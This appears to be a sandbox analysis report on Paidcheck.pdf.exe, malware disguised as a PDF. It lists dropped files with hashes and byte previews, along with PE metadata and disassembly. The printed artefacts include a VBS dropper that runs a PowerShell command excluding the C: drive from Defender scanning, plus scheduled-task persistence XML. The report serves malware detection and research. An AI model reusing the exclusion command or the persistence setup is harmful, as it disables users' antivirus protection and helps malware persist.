                                                                          SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                          Malicious:false
                                                                          Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):22180
                                                                          Entropy (8bit):5.6036359814823635
                                                                          Encrypted:false
                                                                          SSDEEP:384:2tCD+0oF8RO6c9Q2M4KnQwICu7V9wmSJUeRe1BMkmZZkV7ENWDOD4I5iOYs:/O6QE4KQw9VmXeNDW42S
                                                                          MD5:479FD065539F6CB9A9073194EE43BA62
                                                                          SHA1:A42CBC7BA81ABA1675795855760D409D15B519A0
                                                                          SHA-256:CD0AC9E26FBF8ED83477179601F435FF3AB5C7E265A3267F2BD55F9A564558D6
                                                                          SHA-512:873047CDCAD971FB4AE20D00592B561E6DB24022BE65F761260354608C0EE772E931EF56CEF7F6D122690DD68E8364D9E147A386B330A9C461D0F9AE72607581
                                                                          Malicious:false
                                                                          Preview: @...e...........a...........7.).......h.8............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                          C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):64616
                                                                          Entropy (8bit):6.037264560032456
                                                                          Encrypted:false
                                                                          SSDEEP:768:J8XcJiMjm2ieHlPyCsSuJbn8dBhFVBSMQ6Iq8TSYDKpgLaDViRLNdr:9YMaNylPYSAb8dBnTHv8DKKaDVkX
                                                                          MD5:6FD7592411112729BF6B1F2F6C34899F
                                                                          SHA1:5E5C839726D6A43C478AB0B95DBF52136679F5EA
                                                                          SHA-256:FFE4480CCC81B061F725C54587E9D1BA96547D27FE28083305D75796F2EB3E74
                                                                          SHA-512:21EFCC9DEE3960F1A64C6D8A44871742558666BB792D77ACE91236C7DBF42A6CA77086918F363C4391D9C00904C55A952E2C18BE5FA1A67A509827BFC630070D
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...xX.Z..............0.............^.... ........@.. ....................... ............`.....................................O.......8...............h>........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                                                          C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):182
                                                                          Entropy (8bit):4.995421543347364
                                                                          Encrypted:false
                                                                          SSDEEP:3:FER/n0eFHgSSJJF2uV1HeGAFddGeWLCXknRAuWXp5cViEaKC5SufyM1K/RFofD6T:FER/lFHsCu/eGgdEYmRAuWXp+NaZ5Su4
                                                                          MD5:8F1279E3972239624A9E5037A4261E8A
                                                                          SHA1:D45F5CD9A81863BF6B486F77FCB0A1497DD46446
                                                                          SHA-256:C07EF3D32222554903427589627F33C222F6D507D1F161A5FCD11EBF29BFA6CC
                                                                          SHA-512:F0380E6ED1B58EE2A9B83D662E0486AF7352B5B72F72375B72F69E567297F3DC08AD372045E58DD81BC62DE32C9DB22F7A670D208F80B2BEC83B941FF790EDE8
                                                                          Malicious:true
                                                                          Preview: CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'", 0, False
                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qglplkd.nbo.ps1
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview: 1
                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ai3xzej.ihr.psm1
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:very short file (no magic)
                                                                          Category:dropped
                                                                          Size (bytes):1
                                                                          Entropy (8bit):0.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:U:U
                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                          Malicious:false
                                                                          Preview: 1
                                                                          C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1307
                                                                          Entropy (8bit):5.1055546710401485
                                                                          Encrypted:false
                                                                          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0aa5xtn:cbk4oL600QydbQxIYODOLedq3Ba5j
                                                                          MD5:E1762CDA6D6A3715B829E81B77FF06F7
                                                                          SHA1:B9F6318A5E4CDB1462E45A0B08EE46D303C40715
                                                                          SHA-256:48A86564D25864484ABE34BAA5B71890B8AF30ADE8AC1CF14BBACAE28036F09F
                                                                          SHA-512:DC6218645DBE168DCB8DE01124694FF26ED033E7A5CE066FAA1D00817F2E51D167938B4FF4231F514F60895EF0FFE95880D401358C69E49126A219CBF7D3E705
                                                                          Malicious:true
                                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                                          C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1310
                                                                          Entropy (8bit):5.109425792877704
                                                                          Encrypted:false
                                                                          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
                                                                          MD5:5C2F41CFC6F988C859DA7D727AC2B62A
                                                                          SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
                                                                          SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
                                                                          SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
                                                                          Malicious:false
                                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):232
                                                                          Entropy (8bit):7.024371743172393
                                                                          Encrypted:false
                                                                          SSDEEP:6:X4LDAnybgCFcpJSQwP4d7ZrqJgTFwoaw+9XU4:X4LEnybgCFCtvd7ZrCgpwoaw+Z9
                                                                          MD5:32D0AAE13696FF7F8AF33B2D22451028
                                                                          SHA1:EF80C4E0DB2AE8EF288027C9D3518E6950B583A4
                                                                          SHA-256:5347661365E7AD2C1ACC27AB0D150FFA097D9246BB3626FCA06989E976E8DD29
                                                                          SHA-512:1D77FC13512C0DBC4EFD7A66ACB502481E4EFA0FB73D0C7D0942448A72B9B05BA1EA78DDF0BE966363C2E3122E0B631DB7630D044D08C1E1D32B9FB025C356A5
                                                                          Malicious:false
                                                                          Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):8
                                                                          Entropy (8bit):3.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:Wn:Wn
                                                                          MD5:31760B024C72A6DB96428A87598EDAD6
                                                                          SHA1:26D9DC8EE0FEF7C95EDF8865F54A2477F5B2830D
                                                                          SHA-256:A41605947ADFFD965CFD275409AFE1E71BD692055EB86F3E60F3090D35389FA8
                                                                          SHA-512:2A9C2BB93EF3B50FDA97CACF51FF2228FFADDB33BEFD9062370D240141BE2D6121EFE244F7642926E51487D47BBC504C9B24CCDF9BB81C867974C07A4AFFC343
                                                                          Malicious:true
                                                                          Preview: pf.y.M.H
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bak
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):24
                                                                          Entropy (8bit):4.501629167387823
                                                                          Encrypted:false
                                                                          SSDEEP:3:9bzY6oRDIvYk:RzWDI3
                                                                          MD5:ACD3FB4310417DC77FE06F15B0E353E6
                                                                          SHA1:80E7002E655EB5765FDEB21114295CB96AD9D5EB
                                                                          SHA-256:DC3AE604991C9BB8FF8BC4502AE3D0DB8A3317512C0F432490B103B89C1A4368
                                                                          SHA-512:DA46A917DB6276CD4528CFE4AD113292D873CA2EBE53414730F442B83502E5FAF3D1AE87BFA295ADF01E3B44FDBCE239E21A318BFB2CCD1F4753846CB21F6F97
                                                                          Malicious:false
                                                                          Preview: 9iH...}Z.4..f..J".C;"a
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):5.320159765557392
                                                                          Encrypted:false
                                                                          SSDEEP:3:9bzY6oRDIvYVsRLY6oRDT6P2bfVn1:RzWDIfRWDT621
                                                                          MD5:BB0F9B9992809E733EFFF8B0E562CFD6
                                                                          SHA1:F0BAB3CF73A04F5A689E6AFC764FEE9276992742
                                                                          SHA-256:C48F04FE7525AA3A3F9540889883F649726233DE021724823720A59B4F37CEAC
                                                                          SHA-512:AE4280AA460DC1C0301D458A3A443F6884A0BE37481737B2ADAFD72C33C55F09BED88ED239C91FE6F19CA137AC3CD7C9B8454C21D3F8E759687F701C8B3C7A16
                                                                          Malicious:false
                                                                          Preview: 9iH...}Z.4..f..J".C;"a9iH...}Z.4..f.~a........~.~.......3.U.
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):327432
                                                                          Entropy (8bit):7.99938831605763
                                                                          Encrypted:true
                                                                          SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                                                                          MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                                                                          SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                                                                          SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                                                                          SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                                                                          Malicious:false
                                                                          Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                                                                          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
                                                                          Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):44
                                                                          Entropy (8bit):4.308768198567054
                                                                          Encrypted:false
                                                                          SSDEEP:3:oNWXp5cViE2J5xAI0L4A:oNWXp+N23f0L4A
                                                                          MD5:C9298EEE68389B937EFD1A5CE3DB10A2
                                                                          SHA1:2D299BA869C5386FB114AA6016DCB0607DFE98E0
                                                                          SHA-256:270C3AC669C532CE18737BFD72CB2981B65A6F08FF2B7EB5C9A4D8834AEB4E62
                                                                          SHA-512:1EF5C4AC44E1658DC8EA56F98B2714297D39937B9817E4F843D067F59D2778EC3D65E34DD467442F8B7D86248813E834D47A71D79EC3CE2D8E54B8A41BF19FDE
                                                                          Malicious:false
                                                                          Preview: C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):580096
                                                                          Entropy (8bit):6.242459409423084
                                                                          Encrypted:false
                                                                          SSDEEP:12288:UyVRMbXAPtBXomNFYmujpihOcn92JRVkxdGOcA1WJIq:UyVRxPtB3Cjpihvn+VkxIE1c
                                                                          MD5:CE32E8605ADB6C9BB2DCEE69FE887B46
                                                                          SHA1:2ACE1FB1E3523768003B61A4A79193214FFAFED9
                                                                          SHA-256:7E22F7F21E8798805234BE7AC26BAD65C1EDECB55B051343E0933A68041CE073
                                                                          SHA-512:674AD1360E6ED0E1C77865858C08950D6955F8A56544343E9414320470D80258E4FAD0D67EE64423CBC792BFBF2CD6FEE2C1806A837B61F62B7F71C10FE2D9FC
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 33%
                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:.................0......0........... ........@.. .......................@............@.....................................O........-................... ......|................................................ ............... ..H............text....... ...................... ..`.rsrc....-..........................@..@.reloc....... ......................@..B........................H.......H...L............M...x..........................................b.(.....s....}.....(....*....0..Z.......r...p..(....+.s....o....&.{....o....r...po....&r...p...(.....o....r...po....,...&.(......*..........PP........(....*..{....o....r#..po....&.{....o....r7..po....&*...0..........r...p.r...p..o......r...p(....-1.rK..p(....:.....rO..p(....:.....rS..p(....:....*.{....o....rW..po....&r...p..{....o....rq..po....&r...p..{......o....,..{....o....r...po....&*.{....o.....o....
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe:Zone.Identifier
                                                                          Process:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview: [ZoneTransfer]....ZoneId=0
                                                                          C:\Users\user\Documents\20210722\PowerShell_transcript.302494.fAvH+AQY.20210722093349.txt
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):5978
                                                                          Entropy (8bit):5.384226125292334
                                                                          Encrypted:false
                                                                          SSDEEP:96:BZ1hAZN4fqDo1ZUFZGhAZN4fqDo1ZE28srZahAZN4fqDo1ZYDiivZg:8
                                                                          MD5:AB8875BD5B3058B8423A6B26F392B5E7
                                                                          SHA1:9E45AFB3F5211658D59AC397698D841617DC7CF0
                                                                          SHA-256:49EDD3825A4186C0CB39926746C6392AF5D1D3905346C6D212A4E877AFFDC259
                                                                          SHA-512:B27C3C71B2C91FEDE5726FC99027E827847DB7F632999B9C42046023799DCBFF55311457E13F1AEFA8F92F0AC99D521FB2BE579FB5E35AF6C2C807651ED6B283
                                                                          Malicious:false
                                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210722093401..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 302494 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'..Process ID: 748..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210722093401..**********************..PS>Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'..**********************..Windows PowerShell transcript start
                                                                          \Device\ConDrv
                                                                          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1049
                                                                          Entropy (8bit):4.2989523990568035
                                                                          Encrypted:false
                                                                          SSDEEP:24:z3U3g4DO/0XZd3Wo3opQ5ZKBQFYVgt7ovrNOYlK:zEw4DBXZxo4ABV+SrUYE
                                                                          MD5:970EE6AEAB63008333D1D883327DA660
                                                                          SHA1:A71E19F66886B1888A183BA1777A23FABAE9822E
                                                                          SHA-256:D270D397EB3CF1173D25795834B240466EFEE213E11B1B31CDC101015AFFCAD9
                                                                          SHA-512:EB49AEE1B4524E6F15C08345A380D7D28DC845DEBA5408A7D034F2F7F5A652C8A2E2FF293BFB307DE87DCC2FAA111BA3BE8BEF9C4752A73DE1835DCD844D39BB
                                                                          Malicious:false
                                                                          Preview: Microsoft .NET Framework Assembly Registration Utility version 4.7.3056.0..for Microsoft .NET Framework version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....Syntax: RegAsm AssemblyName [Options]..Options:.. /unregister Unregister types.. /tlb[:FileName] Export the assembly to the specified type library.. and register it.. /regfile[:FileName] Generate a reg file with the specified name.. instead of registering the types. This option.. cannot be used with the /u or /tlb options.. /codebase Set the code base in the registry.. /registered Only refer to already registered type libraries.. /asmpath:Directory Look for assembly references here.. /nologo Prevents RegAsm from displaying logo.. /silent Silent mode. Prevents displaying of success messages.. /verbose Displays extra information..

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):6.242459409423084
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                          File name:Paidcheck.pdf.exe
                                                                          File size:580096
                                                                          MD5:ce32e8605adb6c9bb2dcee69fe887b46
                                                                          SHA1:2ace1fb1e3523768003b61a4a79193214ffafed9
                                                                          SHA256:7e22f7f21e8798805234be7ac26bad65c1edecb55b051343e0933a68041ce073
                                                                          SHA512:674ad1360e6ed0e1c77865858c08950d6955f8a56544343e9414320470d80258e4fad0d67ee64423cbc792bfbf2cd6fee2c1806a837b61f62b7f71c10fe2d9fc
                                                                          SSDEEP:12288:UyVRMbXAPtBXomNFYmujpihOcn92JRVkxdGOcA1WJIq:UyVRxPtB3Cjpihvn+VkxIE1c
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:.................0......0........... ........@.. .......................@............@................................

                                                                          File Icon

                                                                          Icon Hash:4e9292f2c88cd3cc

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x48c6ea
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                          Time Stamp:0xC8D6E03A [Sat Oct 10 03:15:06 2076 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:v4.0.30319
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
